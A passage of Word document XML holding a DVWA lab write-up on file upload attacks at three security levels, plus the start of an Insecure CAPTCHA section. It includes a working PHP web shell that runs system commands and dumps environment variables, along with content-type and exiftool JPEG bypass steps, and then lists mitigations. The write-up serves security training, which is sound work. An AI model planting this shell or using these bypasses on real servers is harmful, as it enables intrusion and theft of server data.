      <w:bookmarkStart w:id="24" w:name="_Toc198745911"/>
      <w:r>
        <w:t>File Upload</w:t>
      </w:r>
      <w:r w:rsidR="009036BC">
        <w:t>-Attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="24AB8551" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc198745912"/>
      <w:r>
        <w:t>Intro</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="356B52DA" w14:textId="5B991870" w:rsidR="00EF109E" w:rsidRPr="00EF109E" w:rsidRDefault="00EF109E" w:rsidP="00EF109E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 xml:space="preserve">While testing the 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>File Upload</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF109E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> module in DVWA, I found that the application allowed users to upload files without proper validation. This makes it vulnerable to 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>unrestricted file upload attacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF109E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, where an attacker like me can upload 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>malicious files (e.g., PHP web shells)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF109E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and execute arbitrary commands on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6326390F" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc198745913"/>
      <w:r>
        <w:t>Low</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="0CF28C4A" w14:textId="719F1F2B" w:rsidR="00A03E93" w:rsidRDefault="002A5C76" w:rsidP="00A03E93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002A5C76">
        <w:t>Upload_shellfile_copy_path_insert_url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4BB276" w14:textId="2C7EE35D" w:rsidR="0029543A" w:rsidRDefault="0029543A" w:rsidP="0029543A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="993" w:hanging="567"/>
      </w:pPr>
      <w:r>
        <w:t>Save this php payload in a file “shell.php”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649D11F2" w14:textId="774E3D89" w:rsidR="0029543A" w:rsidRDefault="0029543A" w:rsidP="0029543A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="993" w:hanging="567"/>
      </w:pPr>
      <w:r>
        <w:t>Copy the Path of File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6065CEDC" w14:textId="00BF0ED0" w:rsidR="0029543A" w:rsidRDefault="0029543A" w:rsidP="0029543A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="993" w:hanging="567"/>
      </w:pPr>
      <w:r>
        <w:t>Insert in the url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCC3E27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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027932FE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&lt;h1&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5C76">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>📋</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5C76">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> System Information&lt;/h1&gt;&lt;pre&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA5DF0F" w14:textId="77777777" w:rsidR="002A5C76" w:rsidRPr="002A5C76" w:rsidRDefault="002A5C76" w:rsidP="002A5C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C6B49C6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OS and system details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF9FD21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[*] OS Information:\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6370D0C6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system("uname -a");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A062A72" w14:textId="77777777" w:rsidR="002A5C76" w:rsidRPr="002A5C76" w:rsidRDefault="002A5C76" w:rsidP="002A5C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5997548B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Current user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D933F86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\n[*] Current User:\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F8C827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system("whoami");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47235D27" w14:textId="77777777" w:rsidR="002A5C76" w:rsidRPr="002A5C76" w:rsidRDefault="002A5C76" w:rsidP="002A5C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32B98AF8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User ID and groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131511DB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\n[*] User ID &amp; Groups:\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5AB628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system("id");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750AEDD3" w14:textId="77777777" w:rsidR="002A5C76" w:rsidRPr="002A5C76" w:rsidRDefault="002A5C76" w:rsidP="002A5C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F52BAED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Server software details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D9F8ED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\n[*] Server Software:\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2F8C57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$_SERVER['SERVER_SOFTWARE'] . "\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0727C332" w14:textId="77777777" w:rsidR="002A5C76" w:rsidRPr="002A5C76" w:rsidRDefault="002A5C76" w:rsidP="002A5C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B78039F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PHP version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662FB5EA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\n[*] PHP Version:\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F62B2F7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phpversion() . "\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18788938" w14:textId="77777777" w:rsidR="002A5C76" w:rsidRPr="002A5C76" w:rsidRDefault="002A5C76" w:rsidP="002A5C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6334FADD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Disabled functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0288E21B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\n[*] Disabled PHP Functions:\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5856D5E9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ini_get('disable_functions') . "\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16593D04" w14:textId="77777777" w:rsidR="002A5C76" w:rsidRPr="002A5C76" w:rsidRDefault="002A5C76" w:rsidP="002A5C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7886861C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Current working directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD3E132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\n[*] Current Working Directory:\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A733346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getcwd() . "\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6082E4C9" w14:textId="77777777" w:rsidR="002A5C76" w:rsidRPr="002A5C76" w:rsidRDefault="002A5C76" w:rsidP="002A5C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="188FE37D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Files in current directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6316FE89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\n[*] Files in Current Directory:\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042FBC98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system("ls -la");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3662B922" w14:textId="77777777" w:rsidR="002A5C76" w:rsidRPr="002A5C76" w:rsidRDefault="002A5C76" w:rsidP="002A5C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="046523BF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Environment variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37191A6C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\n[*] Environment Variables:\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59177860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print_r($_ENV);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7471DE3A" w14:textId="77777777" w:rsidR="002A5C76" w:rsidRPr="002A5C76" w:rsidRDefault="002A5C76" w:rsidP="002A5C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F6751BA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Network interfaces (Linux only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B733BF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\n[*] Network Interfaces:\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144904CD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system("ip a || ifconfig");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5049DADA" w14:textId="77777777" w:rsidR="002A5C76" w:rsidRPr="002A5C76" w:rsidRDefault="002A5C76" w:rsidP="002A5C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C5DC7BE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// Running processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C4A919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\n[*] Running Processes:\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3798258F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system("ps aux");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E5B3FE" w14:textId="77777777" w:rsidR="002A5C76" w:rsidRPr="002A5C76" w:rsidRDefault="002A5C76" w:rsidP="002A5C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2136F755" w14:textId="77777777" w:rsidR="002A5C76" w:rsidRP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echo "&lt;/pre&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68282502" w14:textId="54BB4C79" w:rsidR="002A5C76" w:rsidRDefault="002A5C76" w:rsidP="002A5C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A5C76">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11439A00" w14:textId="6DD86548" w:rsidR="002A5C76" w:rsidRPr="002A5C76" w:rsidRDefault="002A5C76" w:rsidP="002A5C7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16EF868" wp14:editId="7D878572">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="132144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6682" w14:textId="59EE7A10" w:rsidR="002A5C76" w:rsidRDefault="002A5C76" w:rsidP="00A03E93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002A5C76">
        <w:t>Shell_Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C7C4EF" w14:textId="102A5683" w:rsidR="002A5C76" w:rsidRPr="00A03E93" w:rsidRDefault="002A5C76" w:rsidP="002A5C76">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="157DAA6B" wp14:editId="48804FF0">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="5984390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DCF9" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc198745914"/>
      <w:r>
        <w:t>Med</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="3600EBA8" w14:textId="49ABAC96" w:rsidR="002A5C76" w:rsidRDefault="002A5C76" w:rsidP="002A5C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002A5C76">
        <w:t>Capture_Req_Replace_Content Type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4F9F47" w14:textId="35BBE6A7" w:rsidR="00432DDD" w:rsidRDefault="00432DDD" w:rsidP="00432DDD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r>
        <w:t>Intercept the Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB9C6BF" w14:textId="70D7EAFB" w:rsidR="00432DDD" w:rsidRDefault="00432DDD" w:rsidP="00432DDD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r>
        <w:t>Replace the content file with shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B0FAC0" w14:textId="2C5C3231" w:rsidR="00432DDD" w:rsidRDefault="00432DDD" w:rsidP="00432DDD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r>
        <w:t>Forward the Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209A4FF1" w14:textId="28A2917D" w:rsidR="002A5C76" w:rsidRDefault="002A5C76" w:rsidP="002A5C76">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38C348FF" wp14:editId="2865126B">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="7606209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AE97" w14:textId="68EB32F3" w:rsidR="002A5C76" w:rsidRDefault="002A5C76" w:rsidP="002A5C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002A5C76">
        <w:t>Output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9302D7" w14:textId="6BCA1C38" w:rsidR="002A5C76" w:rsidRPr="002A5C76" w:rsidRDefault="002A5C76" w:rsidP="002A5C76">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C2876BA" wp14:editId="5E4C18ED">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="4784018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2535" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc198745915"/>
      <w:r>
        <w:t>High</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="5797316A" w14:textId="3EECA361" w:rsidR="002A5C76" w:rsidRDefault="002A5C76" w:rsidP="002A5C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="425"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002A5C76">
        <w:t>Insert_Script_Jpeg_Exiftoo</w:t>
      </w:r>
      <w:r>
        <w:t>l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7286F77D" w14:textId="135DA70F" w:rsidR="00432DDD" w:rsidRDefault="00432DDD" w:rsidP="00432DDD">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Insert the shell.php Script into the jpeg image for bypass the security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB4F80F" w14:textId="730F2E6F" w:rsidR="00E268E0" w:rsidRDefault="00E268E0" w:rsidP="00E268E0">
      <w:pPr>
        <w:ind w:left="1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C0F99CE" wp14:editId="18505D74">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="20251490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2A91" w14:textId="51BB94EE" w:rsidR="002A5C76" w:rsidRDefault="002A5C76" w:rsidP="002A5C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="425"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002A5C76">
        <w:t>Upload_Jpeg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5C662B" w14:textId="0A4A4E03" w:rsidR="00E268E0" w:rsidRDefault="00E268E0" w:rsidP="00E268E0">
      <w:pPr>
        <w:ind w:left="1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D8D2F81" wp14:editId="2DC5CCD9">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="61880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F5AD" w14:textId="349F06E3" w:rsidR="002A5C76" w:rsidRDefault="002A5C76" w:rsidP="002A5C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="425"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002A5C76">
        <w:t>Convert_Jpeg_Php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5FE79F" w14:textId="61A43EFF" w:rsidR="00432DDD" w:rsidRDefault="00432DDD" w:rsidP="00432DDD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="426"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Convert the jpeg file into php format for run the file at server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6951D419" w14:textId="705110F0" w:rsidR="00E268E0" w:rsidRPr="002A5C76" w:rsidRDefault="00E268E0" w:rsidP="00E268E0">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FD913BA" wp14:editId="3681D499">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="5655850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398C" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc198745916"/>
      <w:r>
        <w:t>Mitigation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="5B36228A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File Type Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D7E7D1" w14:textId="77777777" w:rsidR="00EF109E" w:rsidRPr="00EF109E" w:rsidRDefault="00EF109E" w:rsidP="00EF109E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Only allow trusted file extensions (e.g., .jpg, .png)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E5150A" w14:textId="77777777" w:rsidR="00EF109E" w:rsidRPr="00EF109E" w:rsidRDefault="00EF109E" w:rsidP="00EF109E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 xml:space="preserve">Check both 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>client-side</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF109E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and 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>server-side</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666511D9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MIME Type Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6A9D47" w14:textId="77777777" w:rsidR="00EF109E" w:rsidRPr="00EF109E" w:rsidRDefault="00EF109E" w:rsidP="00EF109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Use proper content-type checking (image/jpeg, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2098C3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Rename Uploaded Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C91673A" w14:textId="77777777" w:rsidR="00EF109E" w:rsidRPr="00EF109E" w:rsidRDefault="00EF109E" w:rsidP="00EF109E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Rename files on the server (e.g., upload_&lt;timestamp&gt;.jpg)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5131F59C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Store Outside Web Root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A83DD6" w14:textId="77777777" w:rsidR="00EF109E" w:rsidRPr="00EF109E" w:rsidRDefault="00EF109E" w:rsidP="00EF109E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Save files in directories not accessible via browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4558FE41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Disable Script Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021ED058" w14:textId="77777777" w:rsidR="00EF109E" w:rsidRPr="00EF109E" w:rsidRDefault="00EF109E" w:rsidP="00EF109E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Prevent .php, .asp, .jsp execution in upload folders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732B7371" w14:textId="77777777" w:rsidR="00EF109E" w:rsidRPr="00EF109E" w:rsidRDefault="00EF109E" w:rsidP="00EF109E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Use .htaccess to disable PHP execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA2E4FF" w14:textId="77777777" w:rsidR="00EF109E" w:rsidRPr="00EF109E" w:rsidRDefault="00EF109E" w:rsidP="00EF109E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php_flag engine off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2637D318" w14:textId="77777777" w:rsidR="00EF109E" w:rsidRPr="00EF109E" w:rsidRDefault="00EF109E" w:rsidP="00EF1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109E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use Web Application Firewall (WAF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AA0BFF" w14:textId="77777777" w:rsidR="00EF109E" w:rsidRPr="00EF109E" w:rsidRDefault="00EF109E" w:rsidP="00EF109E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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Block suspicious upload patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E779852" w14:textId="77777777" w:rsidR="00EF109E" w:rsidRPr="00EF109E" w:rsidRDefault="00EF109E" w:rsidP="00EF10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AAB55" w14:textId="0F4645E6" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B"/>
    <w:p w14:paraId="15F442DA" w14:textId="252233B2" w:rsidR="00C3478B" w:rsidRDefault="00C3478B"/>
    <w:p w14:paraId="484EBA1A" w14:textId="58C1C938" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc198745917"/>
      <w:r>
        <w:t>Insecure CAPTCHA</w:t>
      </w:r>
      <w:r w:rsidR="009036BC">
        <w:t>-Attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="34BB117F" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc198745918"/>
      <w:r>
        <w:t>Intro</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="447D0F5D" w14:textId="77777777" w:rsidR="009A7A13" w:rsidRPr="009A7A13" w:rsidRDefault="009A7A13" w:rsidP="009A7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7A1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ile testing the </w:t>
      </w:r>
      <w:r w:rsidRPr="009A7A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ecure CAPTCHA</w:t>
      </w:r>
      <w:r w:rsidRPr="009A7A1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dule in DVWA, I discovered that the CAPTCHA mechanism implemented to prevent brute-force login attempts was vulnerable due to improper validation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC345B2" w14:textId="77777777" w:rsidR="009A7A13" w:rsidRPr="009A7A13" w:rsidRDefault="009A7A13" w:rsidP="009A7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7A1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PTCHAs are meant to prevent automated abuse, but insecure implementations can be bypassed, allowing attackers like me to perform </w:t>
      </w:r>
      <w:r w:rsidRPr="009A7A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tomated brute-force</w:t>
      </w:r>
      <w:r w:rsidRPr="009A7A1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w:r w:rsidRPr="009A7A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am</w:t>
      </w:r>
      <w:r w:rsidRPr="009A7A1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ttacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBB48BD" w14:textId="77777777" w:rsidR="009A7A13" w:rsidRPr="009A7A13" w:rsidRDefault="009A7A13" w:rsidP="009A7A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B1580" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc198745919"/>
      <w:r>
        <w:t>Low</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="6A90DF31" w14:textId="77EE84F8" w:rsidR="009A7A13" w:rsidRDefault="009A7A13" w:rsidP="009A7A13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r w:rsidRPr="009A7A13">
        <w:t>Capture_Req_Without_Click_Captcha.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A7FE9D" w14:textId="177710EE" w:rsidR="009A7A13" w:rsidRDefault="009A7A13" w:rsidP="009A7A13">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="024E3D66" wp14:editId="643765F6">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2114773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0ACE" w14:textId="180C8545" w:rsidR="009A7A13" w:rsidRDefault="009A7A13" w:rsidP="009A7A13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
